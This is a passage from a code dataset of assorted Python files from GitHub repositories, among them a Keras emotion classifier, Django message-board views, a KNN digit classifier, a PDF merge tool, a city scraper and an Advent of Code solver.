file[3] == 'y':\n self.ge_y = np.load(self.path + file)\n\n if file.startswith('it'):\n if file[3] == 'X':\n self.it_X = np.load(self.path + file)\n if file[3] == 'y':\n self.it_y = np.load(self.path + file)\n\n if file.startswith('lan'):\n if file[4] == 'X':\n self.lan_X = np.load(self.path + file)\n if file[4] == 'y':\n self.lan_y = np.load(self.path + file)\n\n def lan_arrays(self):\n '''\n \n function to return X, y of language dataset.\n \n '''\n self.arrays()\n\n return self.lan_X, self.lan_y\n\n def en_arrays(self):\n '''\n \n function to return X, y of english dataset.\n \n '''\n self.arrays()\n\n return self.en_X, self.en_y\n\n def ge_arrays(self):\n '''\n \n function to return X, y of german dataset.\n \n '''\n self.arrays()\n\n return self.ge_X, self.ge_y\n\n def it_arrays(self):\n '''\n \n function to return X, y of italian dataset.\n \n '''\n self.arrays()\n\n return self.it_X, self.it_y\n\n def fr_arrays(self):\n '''\n \n function to return X, y of french dataset.\n \n '''\n self.arrays()\n\n return self.fr_X.shape, self.fr_y\n \n def structure(self, units):\n '''\n \n define convolutional NN structure, \n units = number classes for classification.\n \n '''\n K.clear_session()\n\n self.model = Sequential([\n\n Conv2D(filters = 64, \n kernel_size = (3, 3), \n strides = (3, 3), \n padding = 'valid', \n activation = tk.activations.relu, \n input_shape = (376, 376, 1), \n kernel_initializer = tk.initializers.GlorotNormal(seed = 34)), \n\n BatchNormalization(), \n\n MaxPooling2D(pool_size = (3, 3), \n strides = (3, 3), \n padding = 'valid'),\n\n Dropout(0.4), \n\n Conv2D(filters = 128, \n kernel_size = (3, 3), \n strides = (3, 3), \n padding = 'valid', \n activation = tk.activations.relu), \n\n BatchNormalization(), \n\n MaxPooling2D(pool_size = (3, 3), \n strides = (3, 3), \n padding = 'valid'),\n\n Dropout(0.4), \n\n Flatten(), \n\n Dense(units = 100, \n activation = tk.activations.relu, \n kernel_regularizer=regularizers.l2(0.001)), \n\n BatchNormalization(), \n\n Dense(units = 50, \n activation = tk.activations.relu, \n kernel_regularizer=regularizers.l2(0.001)), \n\n BatchNormalization(), \n\n Dense(units = 20, \n activation = tk.activations.relu, \n kernel_regularizer=regularizers.l2(0.001)), \n\n BatchNormalization(), \n\n Dense(units = units, \n activation = tk.activations.softmax)\n\n ])\n\n self.summary = self.model.summary()\n self.model.compile(optimizer = 'adam', \n loss = tk.losses.categorical_crossentropy, \n metrics = ['categorical_accuracy'])\n \n def lan_fit_save(self):\n '''\n \n fit the model on language datas and save it as .h5.\n \n '''\n for file in os.listdir(self.path):\n if file.startswith('lan'):\n if file[4] == 'X':\n self.lan_X = np.load(self.path + file)\n if file[4] == 'y':\n self.lan_y = np.load(self.path + file)\n\n self.lan_classes = list(np.unique(self.lan_y))\n self.structure(len(self.lan_classes))\n self.ser_lan_y = pd.Series(self.lan_y).map({self.lan_classes[0]: 0, self.lan_classes[1]: 1, self.lan_classes[2]: 2, self.lan_classes[3]: 3})\n self.cat_lan_y = to_categorical(self.ser_lan_y)\n\n self.lan_model = self.model.fit(self.lan_X, \n self.cat_lan_y, \n epochs = 20, \n batch_size = 64, \n validation_split = 0.2)\n \n # self.model.save('models/lan_model.h5')\n \n def en_fit_save(self):\n '''\n \n fit the model on english datas and save it as .h5.\n \n '''\n for file in os.listdir(self.path):\n if file.startswith('en'):\n if file[3] == 'X':\n self.en_X = np.load(self.path + file)\n if file[3] == 'y':\n self.en_y = np.load(self.path + file)\n\n 
self.en_classes = list(np.unique(self.en_y))\n self.structure(len(self.en_classes))\n self.ser_en_y = pd.Series(self.en_y).map({self.en_classes[0]: 0, self.en_classes[1]: 1, self.en_classes[2]: 2, self.en_classes[3]: 3, self.en_classes[4]: 4,self.en_classes[5]: 5})\n self.cat_en_y = to_categorical(self.ser_en_y)\n\n self.en_model = self.model.fit(self.en_X, \n self.cat_en_y, \n epochs = 20, \n batch_size = 64, \n validation_split = 0.2)\n \n # self.model.save('models/en_model.h5')\n \n def ge_fit_save(self):\n '''\n \n fit the model on german datas and save it as .h5.\n \n '''\n for file in os.listdir(self.path):\n if file.startswith('ge'):\n if file[3] == 'X':\n self.ge_X = np.load(self.path + file)\n if file[3] == 'y':\n self.ge_y = np.load(self.path + file)\n\n self.ge_classes = list(np.unique(self.ge_y))\n self.structure(len(self.ge_classes))\n self.ser_ge_y = pd.Series(self.ge_y).map({self.ge_classes[0]: 0, self.ge_classes[1]: 1, self.ge_classes[2]: 2, self.ge_classes[3]: 3, self.ge_classes[4]: 4, self.ge_classes[5]: 5, self.ge_classes[6]: 6})\n self.cat_ge_y = to_categorical(self.ser_ge_y)\n\n self.ge_model = self.model.fit(self.ge_X, \n self.cat_ge_y, \n epochs = 20, \n batch_size = 64, \n validation_split = 0.2)\n \n # self.model.save('models/ge_model.h5')\n \n def it_fit_save(self):\n '''\n \n fit the model on italian datas and save it as .h5.\n \n '''\n for file in os.listdir(self.path):\n if file.startswith('it'):\n if file[3] == 'X':\n self.it_X = np.load(self.path + file)\n if file[3] == 'y':\n self.it_y = np.load(self.path + file)\n\n self.it_classes = list(np.unique(self.it_y))\n self.structure(len(self.it_classes))\n self.ser_it_y = pd.Series(self.it_y).map({self.it_classes[0]: 0, self.it_classes[1]: 1, self.it_classes[2]: 2, self.it_classes[3]: 3, self.it_classes[4]: 4, self.it_classes[5]: 5, self.it_classes[6]: 6})\n self.cat_it_y = to_categorical(self.ser_it_y)\n\n self.it_model = self.model.fit(self.it_X, \n self.cat_it_y, \n epochs = 20, \n batch_size = 64, \n validation_split = 0.2)\n \n # self.model.save('models/it_model.h5')\n\n \n def fr_fit_save(self):\n '''\n \n fit the model on french datas and save it as .h5.\n \n '''\n for file in os.listdir(self.path):\n if file.startswith('fr'):\n if file[3] == 'X':\n self.fr_X = np.load(self.path + file)\n if file[3] == 'y':\n self.fr_y = np.load(self.path + file)\n\n self.fr_classes = list(np.unique(self.fr_y))\n self.structure(len(self.fr_classes))\n self.ser_fr_y = pd.Series(self.fr_y).map({self.fr_classes[0]: 0, self.fr_classes[1]: 1, self.fr_classes[2]: 2, self.fr_classes[3]: 3})\n self.cat_fr_y = to_categorical(self.ser_fr_y)\n\n self.fr_model = self.model.fit(self.fr_X, \n self.cat_fr_y, \n epochs = 10, \n batch_size = 64, \n validation_split = 0.2)\n \n # self.model.save('models/fr_model.h5')\n\n# Models().lan_fit_save()\n# Models().en_fit_save()\n# Models().ge_fit_save()\n# Models().it_fit_save()\n# Models().fr_fit_save()","repo_name":"lucaberbenni/emotions_classifier","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":10490,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"25234127865","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[3]:\n\n\ndef computer_guess(number):\n '''Используется классический алгоритм бинарного поиска. Функция принимает в качестве аргумента загаданное \n пользователем число в диапазоне от 1 до 100, а алгоритм отгадывает его за минимальное количество попыток. 
\n \n Каждое предложенное в качестве отгадки число - медиана все сокращающегося диапазона в зависимости от того, \n меньше или больше отгадка по сранению с загаданным числом.\n '''\n lower_bond = 1 #Нижняя граница изначального диапазона.\n upper_bond = 100 #Верхняя граница изначального диапазона.\n guess = 50 #Первоначальная отгадка.\n count = 0 #Счетчик количества попыток.\n \n if number<1 or number>100:\n print(\"The number must be in range [1, 100]\")\n else:\n while guess != number:\n count +=1\n guess = (lower_bond+upper_bond)//2 #Шаблон для выдачи отгадки.\n print(\"Computer's guess is...\", guess)\n \n #Постепенное сокращение диапазона (границ) отгадки.\n if guess > number:\n upper_bond = guess\n elif guess < number:\n lower_bond = guess + 1\n\n print('The computer guessed', guess, 'in only', count, 'attempts!')\n \n#computer_guess()\n\n","repo_name":"Ksenia-Bochkareva/module_0","sub_path":"Project_0.py","file_name":"Project_0.py","file_ext":"py","file_size_in_byte":1801,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"42778942701","text":"from django.shortcuts import render\r\nfrom .models import Message,Commit\r\nfrom django.http import HttpResponseRedirect\r\nfrom django.db import models\r\nfrom django.http import HttpResponse\r\nfrom django.shortcuts import render,redirect\r\nfrom django.urls import reverse\r\n\r\n# Create your views here.\r\ndef get_message(request):\r\n return render(request,'msg.html')\r\n\r\ndef get_content(request):\r\n if request.method == 'POST':\r\n if request.POST['name'] == '' and request.POST['message'] == '':\r\n return HttpResponse(\"
表单填写有误
\")\r\n else:\r\n name = request.POST.get('name','')\r\n email = request.POST.get('email','')\r\n message = request.POST.get('message','')\r\n\r\n Q_message = Message()\r\n Q_message.name = name\r\n Q_message.email = email\r\n Q_message.text = message\r\n\r\n Q_message.save()\r\n return HttpResponseRedirect('/message/message-list/')\r\n else:\r\n return render(request,'msg.html')\r\n\r\ndef message_list(request):\r\n objs = Message.objects.all()\r\n comObjs = Commit.objects.all()\r\n context = {\r\n 'comObjs': comObjs,\r\n 'objs': objs,\r\n }\r\n return render(request, 'message-list.html', context)\r\n\r\n\r\ndef reply(request,id):\r\n if request.user.is_authenticated:\r\n uid=id\r\n relay = 1\r\n comObjs = Commit.objects.all()\r\n objs = Message.objects.all()\r\n context = {\r\n 'comObjs': comObjs,\r\n 'relay':relay,\r\n 'objs': objs,\r\n 'uid':uid,\r\n }\r\n\r\n return render(request,'message-list.html',context)\r\n else:\r\n return HttpResponseRedirect('/userprofile/login')\r\n\r\ndef commit(request,id):\r\n if request.method == 'GET':\r\n\r\n cuid=id\r\n objs = Message.objects.all()\r\n comObjs = Commit.objects.all()\r\n print(cuid)\r\n context = {\r\n 'comObjs':comObjs,\r\n 'cuid': cuid,\r\n 'objs': objs,\r\n }\r\n return render(request,'message-list.html',context)\r\n else:\r\n st_commit = Commit()\r\n name=request.user\r\n text=request.POST.get('text','')\r\n st_commit.name = name\r\n st_commit.text = text\r\n st_commit.mid = id\r\n st_commit.save()\r\n\r\n return HttpResponseRedirect(\r\n reverse('message:commit',args=(id,))\r\n )\r\n\r\n","repo_name":"opsonly/my_blog","sub_path":"message/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2409,"program_lang":"python","lang":"en","doc_type":"code","stars":54,"dataset":"github-code","pt":"7"} +{"seq_id":"29826697710","text":"from operator import itemgetter # 리스트 sorting 시 특정 key 값으로 정렬하기 위함\n\nclass KNN():\n def __init__(self, k, xtrain, ytrain, yname):\n self.k = k # KNN 에서의 k 값\n self.xtrain = xtrain # train data set feature\n self.ytrain = ytrain # train data set 답\n self.yname = yname # 숫자 0~9 이름 리스트\n self.dim = xtrain[0].__len__() # dimension 즉, data set feature 종류\n self.ylen = yname.__len__() # yname 길이\n self.disarr = [] # distance array 줄임말, [거리, 답] 을 담고있는 리스트\n self.vote_cnt = [[0., 0], [0., 1], [0., 2], [0., 3] ,[0., 4], [0., 5], [0., 6], [0., 7], [0., 8], [0., 9]]\n self.grapcor = [] # 그래프 출력을 하기위해 mv, wmv 의 결과를 순서대로 저장하는 전역 리스트\n self.sqrtdim_double = int((xtrain[0].__len__() ** 0.5)*2) # 784개 feature을 (28+28)개의 feature로 계산한값\n self.hand_xtrain = [] # (56+56)개의 feature로 변환한 train data를 저장하는 리스트\n\n def show_dim(self): # 변수 dim 을 출력하는 함수\n print(\"dim : \", self.dim)\n\n def change_feature(self, data_i): # 데이터 하나를 넣으면 784개 feature을 (56 + 56)개의 feature로 변환하는 함수\n dim_len = int(self.sqrtdim_double / 2) # sqrtdim_double = 56이다. 
dim_len = 28\n flist = [] # (56 + 56)개의 feature로 변환된 데이터를 담을 리스트\n # 행에 대하여\n for i in range(0, dim_len): # 28 행\n (x_max, x_min, res) = (-1, dim_len, 0) # 색칠되어있는 최대 index, 최소 index, 색칠된 갯수 res 초기값 설정\n for j in range(0, dim_len): # 28 열\n if data_i[i*dim_len + j] > (5/255): # train데이터의 [i][j]값이 5/255 이상이면 칠해져있다고 판단\n res += 1 # 색칠된 수 +1\n if x_max < j: # 최대 index가 현재 index보다 작다면\n x_max = j # 최대 index는 현재 index로\n if x_min > j: # 최소 index가 현재 index보다 크다면\n x_min = j # 최소 index는 현재 index로\n if x_max == -1 or x_min == dim_len: # 만일 아무것도 칠해지지 않은 경우이다\n flist.append(0) # i 행 검은색 사이 빈 공간 수(0) feature로 append\n else: # 칠해져 있는게 있는 경우\n flist.append(x_max - x_min - res + 1) # i 행 검은색 사이 빈 공간 수 feature로 append\n flist.append(res) # i 행에 칠해져 있는 갯수 feature로 append\n # 열에 대하여\n for i in range(0, dim_len): # 28 행\n (y_max, y_min, res) = (-1, dim_len, 0) # 색칠되어있는 최대 index, 최소 index, 색칠된 갯수 res 초기값 설정\n for j in range(0, dim_len): # 28 열\n if data_i[j*dim_len + i] > (5/255): # train데이터의 [j][i]값이 5/255 이상이면 칠해져있다고 판단 열을\n res += 1 # 색칠된 수 +1\n if y_max < i: # 최대 index가 현재 index보다 작다면\n y_max = i # 최대 index는 현재 index로\n if y_min > i: # 최소 index가 현재 index보다 크다면\n y_min = i # 최소 index는 현재 index로\n if y_max == -1 or y_min == dim_len: # 만일 아무것도 칠해지지 않은 경우이다\n flist.append(0) # i 열 검은색 사이 빈 공간 수(0) feature로 append\n else: # 칠해져 있는게 있는 경우\n flist.append(y_max - y_min - res + 1) # i 열 검은색 사이 빈 공간 수 feature로 append\n flist.append(res) # i 열에 칠해져 있는 갯수 feature로 append\n return flist # flist 반환\n\n def handcraft_feature(self): # 기존 train 데이터의 feature를 변환한 데이터를 hand_xtrain 리스트에 채워주는 함수\n for k in range(len(self.xtrain)): # trian 데이터의 크기 만큼 for 문\n self.hand_xtrain.append(self.change_feature(self.xtrain[k])) # change_feature함수를 적용, hand_xtrain에 append\n\n def get_nearest_k(self, xtest_i, option): # 가장가까운 점부터 순서대로 disarr 리스트에 저장해주는 함수\n if option == 'feature_compression': # option이 'feature_compression' 인 경우\n dim_len = self.sqrtdim_double * 2 # dim_len = 56 * 2 = 112\n xtesti = self.change_feature(xtest_i) # test데이터의 feature를 변경한다.\n x_train = self.hand_xtrain # 변경된 feature를 가진 train데이터를 사용한다.\n else :\n dim_len = self.dim # feature수 = self.dim\n xtesti = xtest_i # test데이터 그대로 사용\n x_train = self.xtrain # train데이터 그대로 사용\n\n for j in range(len(x_train)): # for 문 (train data set 모두에 대하여)\n res = 0. # disarr 리스트에 담을 거리 값\n for i in range(0, dim_len): # dimension 즉, feature 갯수만큼에 대하여 거리를 계산\n res = res + (float(xtesti[i]) - float(x_train[j][i]))**2 # (train0 - test0)^2 + ... 
+ (trainN - testN)^2\n res = res**0.5 # 마지막에 0.5 승으로 루트를 씌워준다.\n self.disarr.append((res, int(self.ytrain[j]))) # disarr에 [res, 답] 을 append 해준다.\n self.disarr.sort(key=itemgetter(0)) # 최종적으로 disarr를 res 기준으로 sorting 한다 (오름차순)\n\n def mv(self): # Majority Vote 함수\n for j in range(0, self.k): # for 문 (k 값 만큼)\n self.vote_cnt[self.disarr[j][1]][0] += 1 # 가중치는 그냥 갯수이므로 +1 로 해주고, disarr의 0부터 k개를 본다.\n self.vote_cnt.sort(key=itemgetter(0), reverse=True) # vote_cnt에서 가장큰 가중치를 알기 위해 sorting reverse (내림차순)\n self.grapcor.append(self.vote_cnt[0][1]) # 결과를 grapcor 리스트에 넣어준다.\n return self.yname[self.vote_cnt[0][1]] # 결과를 이름으로 반환한다.\n def wmv(self): # Weighted Majority Vote 함수\n for j in range(0, self.k): # for 문 (k 값 만큼)\n self.vote_cnt[self.disarr[j][1]][0] += (1 / self.disarr[j][0]) # 가중치는 1/거리, disarr의 0부터 k개를 본다.\n self.vote_cnt.sort(key=itemgetter(0), reverse=True) # vote_cnt에서 가장큰 가중치를 알기 위해 sorting reverse (내림차순)\n self.grapcor.append(self.vote_cnt[0][1]) # 결과를 grapcor 리스트에 넣어준다.\n return self.yname[self.vote_cnt[0][1]] # 결과를 이름으로 반환한다.\n\n def set_k(self, k): # k 값을 설정하는 set 함수\n self.k = k\n def get_grapcor(self): # grapcor 리스트를 반환해주는 get 함수\n return self.grapcor\n def rest_votecnt(self):\n self.vote_cnt = [[0., 0], [0., 1], [0., 2], [0., 3] ,[0., 4], [0., 5], [0., 6], [0., 7], [0., 8], [0., 9]]\n def reset(self): # disarr 리스트와 vote_cnt 리스트를 초기화 하는 함수\n self.disarr = []\n self.vote_cnt = [[0., 0], [0., 1], [0., 2], [0., 3] ,[0., 4], [0., 5], [0., 6], [0., 7], [0., 8], [0., 9]]","repo_name":"jdb0ss/ML","sub_path":"MNIST_KNN/sourcecode/knnclass.py","file_name":"knnclass.py","file_ext":"py","file_size_in_byte":8347,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"9039007076","text":"import numpy as np\nfrom demo import read, show\nfrom scipy.misc import imread,imresize,imsave\n\n\nimg = read(\"../matlab_example/imgs/0401.tif\")\nimg = imresize(img, (32,32))\nshow(img, cmap='gray')\n\nh , w = img.shape\n# 生成一个同样大小的复数矩阵\nF = np.zeros([h,w],'complex128')\nfor u in range(h):\n for v in range(w):\n res = 0\n for x in range(h):\n for y in range(w):\n res += img[x,y] * np.exp(-1.j * 2 * np.pi * (u * x / h + v * y / w))\n F[u,v] = res\nlog_F = np.log(1 + np.abs(F))\n\nshow(np.abs(log_F), cmap='gray')\n","repo_name":"icemansina/CUHKSZ_DIP","sub_path":"Week4/Tutorial/python_example/dft1_manual.py","file_name":"dft1_manual.py","file_ext":"py","file_size_in_byte":573,"program_lang":"python","lang":"en","doc_type":"code","stars":50,"dataset":"github-code","pt":"7"} +{"seq_id":"9675910306","text":"# -*- coding: UTF-8 -*-\nfrom __future__ import unicode_literals, print_function, division\nimport os\nimport sys\nimport logging\nimport tornado.ioloop\nimport tornado.web\nimport jinja2\nfrom tornado_jinja2 import Jinja2Loader\nfrom expenditure_application.main import ApplicationsHandler, ApplicationHandler, ApplicationApprovalHandler, \\\n ApplicationRejectionHandler, NewApplicationHandler, MailNotificationHandler\n\nLOGGER = logging.getLogger('expenditure_application')\nLOGGER.setLevel(logging.DEBUG)\nLOGGER.addHandler(logging.StreamHandler(sys.stdout))\n\n\ndef make_app():\n template_path = os.path.join(os.path.dirname(__file__), 'expenditure_application/templates')\n jinja2_env = jinja2.Environment(loader=jinja2.FileSystemLoader(template_path), autoescape=True)\n jinja2_loader = Jinja2Loader(jinja2_env)\n settings = dict(\n template_loader=jinja2_loader,\n static_path=os.path.join(os.path.dirname(__file__), 'static'),\n debug=False\n )\n return 
tornado.web.Application([\n (r'/', tornado.web.RedirectHandler, dict(url='/applications')),\n (r'/notify', MailNotificationHandler),\n (r'/applications', ApplicationsHandler),\n (r'/applications/new', NewApplicationHandler),\n (r'/applications/(\\d+)', ApplicationHandler),\n (r'/applications/(\\d+)/approval', ApplicationApprovalHandler),\n (r'/applications/(\\d+)/rejection', ApplicationRejectionHandler),\n ], **settings)\n\n\nif __name__ == '__main__':\n app = make_app()\n app.listen(8888, address='127.0.0.1')\n tornado.ioloop.IOLoop.current().start()\n","repo_name":"dawncold/expenditure-application","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1582,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"42926682973","text":"import pandas as pd\nfrom os.path import join\nimport numpy as np\nimport sys\n\n\ndef citeseer_to_graph(dirpath = 'citeseer_data'):\n\n cites = pd.read_csv(join(dirpath, \"citeseer.cites\"), header=None, sep=\"\\t\")\n content = pd.read_csv(join(dirpath, \"citeseer.content\"), header=None, sep=\"\\t\")\n key_docs = list(set(cites.iloc[:, 0]).union(set(cites.iloc[:, 1])))\n num_docs = len(key_docs)\n key_docs_map = {key_docs[i]: i for i in range(num_docs)}\n\n num_words = content.shape[1] - 2\n key_words = []\n for i in range(0, num_words):\n key_words.append('w'+str(i))\n key_words_map = {}\n\n j=0\n for i in range(num_docs,num_docs+num_words):\n key_words_map[(key_words[j])] = i\n j+=1\n\n nodes_map = dict(key_docs_map,**key_words_map)\n\n adj = np.zeros(shape=(num_docs+num_words, num_docs+num_words), dtype=np.uint8)\n\n n = 0\n for index, row in cites.iterrows():\n sys.stdout.write('\\r' + \"(Citeseer) Loading graph... \" + str(int(n * 100 / (len(cites) + len(content)))) + '%')\n sys.stdout.flush()\n paper1 = key_docs_map[row[0]]\n paper2 = key_docs_map[row[1]]\n adj[paper2, paper1] = 1\n adj[paper1, paper2] = 1\n n+=1\n\n for index, row in content.iterrows():\n paper = row[0]\n sys.stdout.write('\\r' + \"(Citeseer) Loading graph... \" + str(int(n * 100 / (len(cites) + len(content)))) + '%')\n sys.stdout.flush()\n for i in range(1,len(row)-2):\n\n if row[i] == 1:\n if str(paper) in key_docs_map:\n adj[key_docs_map[str(paper)], num_docs+i] = 1\n adj[num_docs+i, key_docs_map[str(paper)]] = 1\n\n n+=1\n sys.stdout.write('\\r' + \"Loading graph... \" + str(100) + '%')\n sys.stdout.flush()\n sys.stdout.write('\\r' + \"Loading graph... 
DONE\")\n print ('\\n')\n\n nodes = {}\n for i in range(0,adj.shape[1]):\n nodes[(i)] = adj[:,i]\n\n return adj, nodes, nodes_map","repo_name":"gsap91/Graph-Convolutional-Network","sub_path":"Desktop/GraphConvolutionalNetwork/citeseer.py","file_name":"citeseer.py","file_ext":"py","file_size_in_byte":1952,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"32808565393","text":"# (c) AlenPaulVarghese\n# -*- coding: utf-8 -*-\n\nfrom pathlib import Path\nfrom typing import Dict, List\n\nfrom pikepdf import Pdf\nfrom pyrogram.handlers import MessageHandler\n\nfrom tools.scaffold import AbstractTask\n\n\nclass Merge(AbstractTask):\n def __init__(self, chat_id: int, message_id: int):\n # downloaded temporary files which are waiting for user confirmation to be added in proposed_files.\n self.temp_files: Dict[int, Path] = {}\n # files that will be going to output.\n self.proposed_files: List[Path] = []\n # for flag -q; reduces info messages.\n self.quiet: bool = False\n # for flag -i; send files directly to proposed queue without user approval.\n self.interactive: bool = False\n # handler used to register incoming media files.\n self.handler: MessageHandler = None\n\n super().__init__(chat_id, message_id)\n\n def set_handler(self, _handler: MessageHandler):\n self.handler = _handler\n\n def process(self):\n with Pdf.open(self.proposed_files.pop(0)) as init_pdf:\n for paths in self.proposed_files:\n with Pdf.open(paths) as extension:\n init_pdf.pages.extend(extension.pages)\n init_pdf.save(self.cwd / self.filename)\n","repo_name":"alenpaulvarghese/pdf_bot","sub_path":"pdf_bot/tools/merge.py","file_name":"merge.py","file_ext":"py","file_size_in_byte":1274,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"15637154744","text":"import requests\nfrom bs4 import BeautifulSoup\n\nurl = 'https://www.britannica.com/topic/list-of-cities-and-towns-in-the-United-States-2023068'\nhtml = requests.get(url)\nhtml_text = html.text\nsoup = BeautifulSoup(html_text, features=\"html.parser\")\ncity_list = []\nfor i in soup.find_all(class_=\"md-crosslink\", href=True):\n city_list.append(i.text.strip())\n\ncity_list = city_list[3:]\n\n# https://gist.github.com/norcal82/e4c7e8113f377db184bb\nstate_names = [\"Alaska\", \"Alabama\", \"Arkansas\", \"American Samoa\", \"Arizona\", \"California\", \"Colorado\", \"Connecticut\", \"District \", \"of Columbia\", \"Delaware\", \"Florida\", \"Georgia\", \"Guam\", \"Hawaii\", \"Iowa\", \"Idaho\", \"Illinois\", \"Indiana\", \"Kansas\", \"Kentucky\", \"Louisiana\", \"Massachusetts\", \"Maryland\", \"Maine\", \"Michigan\", \"Minnesota\", \"Missouri\", \"Mississippi\", \"Montana\", \"North Carolina\", \"North Dakota\", \"Nebraska\", \"New Hampshire\", \"New Jersey\", \"New Mexico\", \"Nevada\", \"New York\", \"Ohio\", \"Oklahoma\", \"Oregon\", \"Pennsylvania\", \"Puerto Rico\", \"Rhode Island\", \"South Carolina\", \"South Dakota\", \"Tennessee\", \"Texas\", \"Utah\", \"Virginia\", \"Virgin Islands\", \"Vermont\", \"Washington\", \"Wisconsin\", \"West Virginia\", \"Wyoming\"]\n\n# https://gist.github.com/JeffPaine/3083347\nstates_dict = {\n 'AK': 'Alaska',\n 'AL': 'Alabama',\n 'AR': 'Arkansas',\n 'AZ': 'Arizona',\n 'CA': 'California',\n 'CO': 'Colorado',\n 'CT': 'Connecticut',\n 'DC': 'District of Columbia',\n 'DE': 'Delaware',\n 'FL': 'Florida',\n 'GA': 'Georgia',\n 'HI': 'Hawaii',\n 'IA': 'Iowa',\n 'ID': 'Idaho',\n 'IL': 'Illinois',\n 'IN': 'Indiana',\n 'KS': 
'Kansas',\n 'KY': 'Kentucky',\n 'LA': 'Louisiana',\n 'MA': 'Massachusetts',\n 'MD': 'Maryland',\n 'ME': 'Maine',\n 'MI': 'Michigan',\n 'MN': 'Minnesota',\n 'MO': 'Missouri',\n 'MS': 'Mississippi',\n 'MT': 'Montana',\n 'NC': 'North Carolina',\n 'ND': 'North Dakota',\n 'NE': 'Nebraska',\n 'NH': 'New Hampshire',\n 'NJ': 'New Jersey',\n 'NM': 'New Mexico',\n 'NV': 'Nevada',\n 'NY': 'New York',\n 'OH': 'Ohio',\n 'OK': 'Oklahoma',\n 'OR': 'Oregon',\n 'PA': 'Pennsylvania',\n 'RI': 'Rhode Island',\n 'SC': 'South Carolina',\n 'SD': 'South Dakota',\n 'TN': 'Tennessee',\n 'TX': 'Texas',\n 'UT': 'Utah',\n 'VA': 'Virginia',\n 'VT': 'Vermont',\n 'WA': 'Washington',\n 'WI': 'Wisconsin',\n 'WV': 'West Virginia',\n 'WY': 'Wyoming'\n}\n\nstates_dict = {y: x for x, y in states_dict.items()}\n\ncity_state_list = []\nstate = 'filler state'\n\nfor city in city_list:\n if city in state_names:\n state = city\n else:\n city_state_list.append(f'{city} {states_dict[state]}')\n","repo_name":"Joeyjas5963/Final-Project","sub_path":"cities.py","file_name":"cities.py","file_ext":"py","file_size_in_byte":2626,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"71772344864","text":"from tkinter import *\n\nroot =Tk()\nroot.geometry(\"350x250\")\nroot.title(\"PanedWindow Example\")\npw = PanedWindow(orient=VERTICAL)\npw.pack(expand=True, fill=BOTH)\n\nchk = Checkbutton(pw, text=\"Click\")\nchk.pack()\n\nbtn = Button(pw, text=\"Click Me\")\nbtn.pack()\npw.add(btn)\npw.add(chk)\nroot.mainloop()","repo_name":"Coding-workplace/testing","sub_path":"TkinterPractice/singleWidgetDemo/panewindow.py","file_name":"panewindow.py","file_ext":"py","file_size_in_byte":292,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"42722170344","text":"\"\"\"Beacon Scanner\nhttps://adventofcode.com/2021/day/19\n\nI was in flight to Tampa for this one, so this is mostly Jeff and David's code.\n\"\"\"\nimport copy\nfrom itertools import permutations, product\nfrom typing import Counter\n\nimport numpy as np\nfrom scipy.spatial.distance import cdist\n\n# Cube rotation matrices\n# https://en.wikipedia.org/wiki/Octahedral_symmetry#Rotation_matrices\ncube_reflections = [np.diag(x) for x in product([-1, 1], repeat=3)]\ncube_rotations = [\n reflection[list(x)]\n for x in permutations(range(3))\n for reflection in cube_reflections\n if np.linalg.det(reflection[list(x)]) > 0\n]\n\n\nclass ScannerRotation:\n def __init__(\n self,\n x_flip: bool,\n y_flip: bool,\n z_flip: bool,\n permutation: tuple[int, int, int],\n ):\n self.x_sign = -1 if x_flip else 1\n self.y_sign = -1 if y_flip else 1\n self.z_sign = -1 if z_flip else 1\n self.permutation = permutation\n\n def rotate(self, points: np.ndarray) -> np.ndarray:\n new_array = np.copy(points[:, self.permutation])\n new_array[:, 0] *= self.x_sign\n new_array[:, 1] *= self.y_sign\n new_array[:, 2] *= self.z_sign\n return new_array\n\n def compose(self, other: \"ScannerRotation\") -> \"ScannerRotation\":\n x_flip = self.x_sign * other.x_sign == -1\n y_flip = self.y_sign * other.y_sign == -1\n z_flip = self.z_sign * other.z_sign == -1\n other_permutation = list(other.permutation)\n permutation = tuple(other_permutation[i] for i in list(self.permutation))\n return ScannerRotation(x_flip, y_flip, z_flip, permutation)\n\n\nclass Scanner:\n def __init__(self, scanner_number: int, list_of_points: list[list[int]]):\n self.scanner_number = scanner_number\n self.beacons = np.array(list_of_points)\n # 
self.dist_mat = distance_matrix(self.beacons, self.beacons)\n self.offset = np.array([0, 0, 0])\n\n def add_new_points(\n self, other: \"Scanner\", offset: np.ndarray, rotation: ScannerRotation\n ):\n rot_and_trans = (rotation @ other.beacons.T).T - offset\n blist = self.beacons.tolist()\n to_include = [list(point) not in blist for point in rot_and_trans]\n self.beacons = np.append(self.beacons, rot_and_trans[to_include, :], axis=0)\n\n def __repr__(self):\n ret_val = f\"--- scanner {self.scanner_number} ---\\n\"\n for i in range(self.beacons.shape[0]):\n for j in range(self.beacons.shape[1]):\n ret_val += (\",\" if j > 0 else \"\") + str(self.beacons[i, j])\n ret_val += \"\\n\"\n return ret_val\n\n\ndef solve_a(s: str) -> int:\n scanners = parse_input(s)\n to_check = copy.deepcopy(scanners[0])\n to_scan = set(scanners[1:])\n\n while len(to_scan) > 0:\n to_scan = scan_list(to_check, to_scan)\n\n return f\"{to_check.beacons.shape[0]}\"\n\n\ndef parse_input(s: str):\n sensor_lines = s.split(\"\\n\")\n scanners = []\n scanner_beacons: list[list[int]] = []\n ii_scan = -1\n for sensor_line in sensor_lines:\n if \"---\" in sensor_line:\n ii_scan += 1\n scanner_beacons.append([])\n elif len(sensor_line.strip()) != 0:\n scanner_beacons[ii_scan].append([int(x) for x in sensor_line.split(\",\")])\n for scanner in scanner_beacons:\n 